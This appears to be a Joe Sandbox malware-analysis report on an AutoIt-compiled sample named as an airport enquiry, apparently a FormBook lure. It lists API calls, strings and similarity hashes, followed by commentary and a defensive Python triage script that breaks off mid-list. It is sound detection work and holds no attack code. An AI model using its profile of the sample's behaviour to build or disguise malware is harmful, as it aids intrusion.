            • Opcode Fuzzy Hash: f31960e22be2db53703bd0dde0da757fd817155b101ac75ef45ecccc1dd11be8
            • Instruction Fuzzy Hash: C0D052A91607887AEC2C8B239C5FF778208F300782FE0428AB112CB5C2E8D06D50A030
            APIs
            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00CD88D1), ref: 00CD8CB3
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: LogonUser
            • String ID:
            • API String ID: 1244722697-0
            • Opcode ID: 2241b4734811c0e0754c347f2cc542201fd4149eb8b0d162542388e532d2bcac
            • Instruction ID: 5c9790ed6637460984094400e1ab5ac90e0d1a63e34b5392983ab5eed13241f7
            • Opcode Fuzzy Hash: 2241b4734811c0e0754c347f2cc542201fd4149eb8b0d162542388e532d2bcac
            • Instruction Fuzzy Hash: 06D05E3226060EABEF018FA4DC01EAF3B69EB04B01F408111FE15C51A1C775D835AB60
            APIs
            • GetUserNameW.ADVAPI32(?,?), ref: 00CC2242
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: NameUser
            • String ID:
            • API String ID: 2645101109-0
            • Opcode ID: 381e4444571f8922ba8b874fbbdaa35c089be0ba52fb18c33ac5d69880b5121a
            • Instruction ID: da212955ea2e6ee2ca5ac0a941b1e65eee931a35749310f8b58abc771d11761b
            • Opcode Fuzzy Hash: 381e4444571f8922ba8b874fbbdaa35c089be0ba52fb18c33ac5d69880b5121a
            • Instruction Fuzzy Hash: 82C04CF1C00209DBDB15DB91DA98EEE77BCAB04304F244055E545F2101D7749B448E71
            APIs
            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00CAA36A
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: 05ccd86343f9d38f44e16c11c7dc667c41c26e2cdd420e48466613b1c3b51a80
            • Instruction ID: 34fa88be6f74b1c3f5c54da05f45746a193a4569a1a16ea26ad716b21613cf1b
            • Opcode Fuzzy Hash: 05ccd86343f9d38f44e16c11c7dc667c41c26e2cdd420e48466613b1c3b51a80
            • Instruction Fuzzy Hash: DBA0123000420CA7CA001B41EC044447F5CD6001A07004020F40C80521877254104590
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1f9557c4532e407b5fb62d6a0d3fef92c06b52312604ccd357fb70f03906a981
            • Instruction ID: 97fbc0fbb39056a436b558d7414e8c087eb94ce4b76232dd6194e80e3e674001
            • Opcode Fuzzy Hash: 1f9557c4532e407b5fb62d6a0d3fef92c06b52312604ccd357fb70f03906a981
            • Instruction Fuzzy Hash: 40223830905616CBDF388F29C49867DB7A1EB03340F68486BD9629B391DB34DF89DB60
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
            • Instruction ID: 39ed6937710466dccc3d9cb9d415663a8b4aa4824c1e4f3b875890851f3c1d08
            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
            • Instruction Fuzzy Hash: 10C181322050B309DB6D467ED83413EBAE15AA37B531E075DE8B3CB5D4EF20D664E620
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
            • Instruction ID: 58d3aad2247bf103394de673fb7e0b70fcf56e5a7566a7e1d90fd23ece6baa4d
            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
            • Instruction Fuzzy Hash: E8C184322051B30ADB6D467E983403EBBE15A937B531E075DE8B3DB5D4EF20D624A620
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
            • Instruction ID: dc8c64014096cbe2a691029a3e2e99a98377c9ef8dd0374b1a74baf7160e1a85
            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
            • Instruction Fuzzy Hash: 21C172322051A30DDF6D467A983403EBAE15AA37B971E076DECB3CB5D4EF20D624D620
            APIs
            • DeleteObject.GDI32(00000000), ref: 00CF7B70
            • DeleteObject.GDI32(00000000), ref: 00CF7B82
            • DestroyWindow.USER32 ref: 00CF7B90
            • GetDesktopWindow.USER32 ref: 00CF7BAA
            • GetWindowRect.USER32(00000000), ref: 00CF7BB1
            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00CF7CF2
            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00CF7D02
            • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF7D4A
            • GetClientRect.USER32(00000000,?), ref: 00CF7D56
            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00CF7D90
            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF7DB2
            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF7DC5
            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF7DD0
            • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF7DD9
            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF7DE8
            • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF7DF1
            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF7DF8
            • GlobalFree.KERNEL32(00000000), ref: 00CF7E03
            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF7E15
            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00D12CAC,00000000), ref: 00CF7E2B
            • GlobalFree.KERNEL32(00000000), ref: 00CF7E3B
            • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00CF7E61
            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00CF7E80
            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF7EA2
            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF808F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
            • String ID: $AutoIt v3$DISPLAY$static
            • API String ID: 2211948467-2373415609
            • Opcode ID: 77cdf3c9e46e7422dca4353c369c5496102b8b7641749205002c1afc85f44188
            • Instruction ID: b88a75e08b49f9d718fcca3053e056f3f63f3bcc0681f0379ab621905f318fea
            • Opcode Fuzzy Hash: 77cdf3c9e46e7422dca4353c369c5496102b8b7641749205002c1afc85f44188
            • Instruction Fuzzy Hash: 09027C75900209EFDB14DFA4CC89EAE7BB9EB49314F148158F919EB3A1CB71AD01CB61
            APIs
            • CharUpperBuffW.USER32(?,?,00D0F910), ref: 00D038AF
            • IsWindowVisible.USER32(?), ref: 00D038D3
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: BuffCharUpperVisibleWindow
            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
            • API String ID: 4105515805-45149045
            • Opcode ID: c9786a52d254e6e8ed243b7ac0c1517832e9f073b03a7261339bdf3c1d7a6ef2
            • Instruction ID: 9bef24cb9f2e8cc2671e53b79fc40a4f79a4389ce0000dc9d1271bf1e4e0b67c
            • Opcode Fuzzy Hash: c9786a52d254e6e8ed243b7ac0c1517832e9f073b03a7261339bdf3c1d7a6ef2
            • Instruction Fuzzy Hash: 12D170342043069BCB14EF10C491B6AB7A9EF95358F14445DF9CA9B3E2CB31EE0ADB65
            APIs
            • SetTextColor.GDI32(?,00000000), ref: 00D0A89F
            • GetSysColorBrush.USER32(0000000F), ref: 00D0A8D0
            • GetSysColor.USER32(0000000F), ref: 00D0A8DC
            • SetBkColor.GDI32(?,000000FF), ref: 00D0A8F6
            • SelectObject.GDI32(?,?), ref: 00D0A905
            • InflateRect.USER32(?,000000FF,000000FF), ref: 00D0A930
            • GetSysColor.USER32(00000010), ref: 00D0A938
            • CreateSolidBrush.GDI32(00000000), ref: 00D0A93F
            • FrameRect.USER32(?,?,00000000), ref: 00D0A94E
            • DeleteObject.GDI32(00000000), ref: 00D0A955
            • InflateRect.USER32(?,000000FE,000000FE), ref: 00D0A9A0
            • FillRect.USER32(?,?,?), ref: 00D0A9D2
            • GetWindowLongW.USER32(?,000000F0), ref: 00D0A9FD
              • Part of subcall function 00D0AB60: GetSysColor.USER32(00000012), ref: 00D0AB99
              • Part of subcall function 00D0AB60: SetTextColor.GDI32(?,?), ref: 00D0AB9D
              • Part of subcall function 00D0AB60: GetSysColorBrush.USER32(0000000F), ref: 00D0ABB3
              • Part of subcall function 00D0AB60: GetSysColor.USER32(0000000F), ref: 00D0ABBE
              • Part of subcall function 00D0AB60: GetSysColor.USER32(00000011), ref: 00D0ABDB
              • Part of subcall function 00D0AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00D0ABE9
              • Part of subcall function 00D0AB60: SelectObject.GDI32(?,00000000), ref: 00D0ABFA
              • Part of subcall function 00D0AB60: SetBkColor.GDI32(?,00000000), ref: 00D0AC03
              • Part of subcall function 00D0AB60: SelectObject.GDI32(?,?), ref: 00D0AC10
              • Part of subcall function 00D0AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00D0AC2F
              • Part of subcall function 00D0AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00D0AC46
              • Part of subcall function 00D0AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00D0AC5B
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
            • String ID:
            • API String ID: 4124339563-0
            • Opcode ID: 2581bec91832b476782b9a0e6022672ba62db3e5e49dbb07b2c31034301dceaf
            • Instruction ID: 31ff6a772fb2951b7d62703dfebdfe0a79fed06b316430c6cb1ecd0e895feb0f
            • Opcode Fuzzy Hash: 2581bec91832b476782b9a0e6022672ba62db3e5e49dbb07b2c31034301dceaf
            • Instruction Fuzzy Hash: 22A18271108301AFD720DF68DC08B5B7BA9FF89321F244A29F96AD62E0D771D944CB62
            APIs
            • DestroyWindow.USER32(?,?,?), ref: 00C82CA2
            • DeleteObject.GDI32(00000000), ref: 00C82CE8
            • DeleteObject.GDI32(00000000), ref: 00C82CF3
            • DestroyIcon.USER32(00000000,?,?,?), ref: 00C82CFE
            • DestroyWindow.USER32(00000000,?,?,?), ref: 00C82D09
            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00CBC68B
            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00CBC6C4
            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00CBCAED
              • Part of subcall function 00C81B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C82036,?,00000000,?,?,?,?,00C816CB,00000000,?), ref: 00C81B9A
            • SendMessageW.USER32(?,00001053), ref: 00CBCB2A
            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00CBCB41
            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00CBCB57
            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00CBCB62
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
            • String ID: 0
            • API String ID: 464785882-4108050209
            • Opcode ID: a3f8cd9be3e8797335d235bc09120f0fabc90d549d4cb662675423feed122dbd
            • Instruction ID: a66b548e84c158123fec1fad71475c4032d4315c9b3b0a0109afad7a4e6d8946
            • Opcode Fuzzy Hash: a3f8cd9be3e8797335d235bc09120f0fabc90d549d4cb662675423feed122dbd
            • Instruction Fuzzy Hash: C6128F30604201EFEB24DF24C888BA9B7E5BF45314F544579F4AADB662CB31ED42DB61
            APIs
            • DestroyWindow.USER32(00000000), ref: 00CF77F1
            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00CF78B0
            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00CF78EE
            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00CF7900
            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00CF7946
            • GetClientRect.USER32(00000000,?), ref: 00CF7952
            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00CF7996
            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00CF79A5
            • GetStockObject.GDI32(00000011), ref: 00CF79B5
            • SelectObject.GDI32(00000000,00000000), ref: 00CF79B9
            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00CF79C9
            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CF79D2
            • DeleteDC.GDI32(00000000), ref: 00CF79DB
            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00CF7A07
            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00CF7A1E
            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00CF7A59
            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00CF7A6D
            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00CF7A7E
            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00CF7AAE
            • GetStockObject.GDI32(00000011), ref: 00CF7AB9
            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00CF7AC4
            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00CF7ACE
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
            • API String ID: 2910397461-517079104
            • Opcode ID: 4711bd767d44773180f16430444c6faf18b347443146b2af19b452a25a977a3c
            • Instruction ID: 3d1f91c86f46225b9aa1dbb95aa4228d184897b01905ff6ccbf0f4cb6ebba4e8
            • Opcode Fuzzy Hash: 4711bd767d44773180f16430444c6faf18b347443146b2af19b452a25a977a3c
            • Instruction Fuzzy Hash: 36A16075A40209BFEB14DF64DC8AFAE7BA9EB45714F104214FA15E72E0C7B0AD04CB65
            APIs
            • SetErrorMode.KERNEL32(00000001), ref: 00CEAF89
            • GetDriveTypeW.KERNEL32(?,00D0FAC0,?,\\.\,00D0F910), ref: 00CEB066
            • SetErrorMode.KERNEL32(00000000,00D0FAC0,?,\\.\,00D0F910), ref: 00CEB1C4
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ErrorMode$DriveType
            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
            • API String ID: 2907320926-4222207086
            • Opcode ID: 03a1bc20cdfd0d71c60f0cbec6988f28d80d6f5a94b064551954870d1e079178
            • Instruction ID: 0379116ce52902d965f1888bf73f0ba73218bbd283f5cbbf7beb45e6cd02c3a3
            • Opcode Fuzzy Hash: 03a1bc20cdfd0d71c60f0cbec6988f28d80d6f5a94b064551954870d1e079178
            • Instruction Fuzzy Hash: B451D370780385EFCB14EB17C9D2DBF73B0EB14355B244026E45AA7290C775AE45EB62
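The Similarity fields repeated for every function above (API ID, String ID) follow a fixed construction that can be rebuilt from the APIs and Strings listed for that function, which is what makes them usable for matching functions across dumps and across samples. The Python below is an added example, not Joe Sandbox's or the IDA plugin's own code: the construction rule is inferred from the listings on this page (split each API name at uppercase letters, drop tokens shorter than four characters, count tokens including the ones under "Part of subcall function", group by descending count, concatenate alphabetically inside a group, join groups with "$"; String ID is the string list sorted by code point and joined with "$"). The numeric "API String ID" pair is not reproduced, since the page does not show which hash produces it. The two call lists embedded in the code are transcribed from the splash-image function (ref 00CF7B70 to 00CF808F) and the control-teardown function (ref 00C82CA2 to 00CBCB62) above. One caveat worth keeping in mind when using these IDs for triage: the functions in this section carrying the strings "AutoIt v3", "#requireadmin", "#OnAutoItStartRegister" and the drive-type names belong to the AutoIt v3 interpreter that the sample is built on, so their API IDs will recur in any AutoIt-compiled binary and say nothing about the embedded script; matching on them filters runtime code out, it does not identify the FormBook payload.

```python
import re
from collections import Counter

# Added example: rebuilds the "API ID" / "String ID" similarity fields of a
# Joe Sandbox function listing from its API calls and strings. The rule is
# inferred from the listings in this report, not taken from Joe Sandbox code.

MIN_TOKEN_LEN = 4  # inferred: "Get", "Set", "Sys", "Ex", "W" never show up in an API ID


def split_api_name(name):
    """Split an API name at every uppercase letter.

    "CreateWindowExW"   -> ["Create", "Window", "Ex", "W"]
    "ImageList_Destroy" -> ["Image", "List_", "Destroy"]
    "mouse_event"       -> ["mouse_event"]  (no uppercase letters: one token)
    """
    return [t for t in re.split(r"(?=[A-Z])", name) if t]


def api_tokens(calls):
    """Count the tokens of MIN_TOKEN_LEN or more characters over all calls.

    Calls listed under "Part of subcall function" count as well; the report's
    groupings only reproduce when they are included.
    """
    return Counter(
        tok for name in calls for tok in split_api_name(name) if len(tok) >= MIN_TOKEN_LEN
    )


def api_id(calls):
    """Groups of equal count, most frequent first; tokens concatenated
    alphabetically inside a group; groups joined by '$'."""
    by_count = {}
    for tok, n in api_tokens(calls).items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


def string_id(strings):
    """Strings sorted by code point (digits, then uppercase, then '\\', then
    lowercase, as in the DriveType listing above), joined by '$'."""
    return "$".join(sorted(strings))


def jaccard(calls_a, calls_b):
    """Multiset Jaccard similarity of two functions' token counts, 0.0 to 1.0:
    a simple way to rank which listed functions resemble each other."""
    a, b = api_tokens(calls_a), api_tokens(calls_b)
    inter = sum((a & b).values())
    union = sum((a | b).values())
    return inter / union if union else 0.0


# Transcribed from the splash-image function above (ref 00CF7B70 .. 00CF808F).
SPLASH_IMAGE_CALLS = [
    "DeleteObject", "DeleteObject", "DestroyWindow", "GetDesktopWindow",
    "GetWindowRect", "SetRect", "AdjustWindowRectEx", "CreateWindowExW",
    "GetClientRect", "CreateWindowExW", "CreateFileW", "GetFileSize",
    "GlobalAlloc", "GlobalLock", "ReadFile", "GlobalUnlock", "CloseHandle",
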